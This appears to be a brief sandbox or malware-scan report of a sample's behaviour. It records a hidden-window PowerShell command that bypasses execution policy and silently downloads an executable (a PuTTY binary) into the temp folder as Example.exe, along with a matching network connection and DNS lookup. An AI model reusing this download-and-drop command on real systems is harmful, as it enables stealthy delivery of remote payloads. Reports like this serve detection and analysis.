Technical information
- https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe as %temp%\example.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe','%TEMP%\Example.e...
- 'th#.#arth.li':443
- DNS ASK th#.#arth.li
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe','%TEMP%\Example.e...' (with hidden window)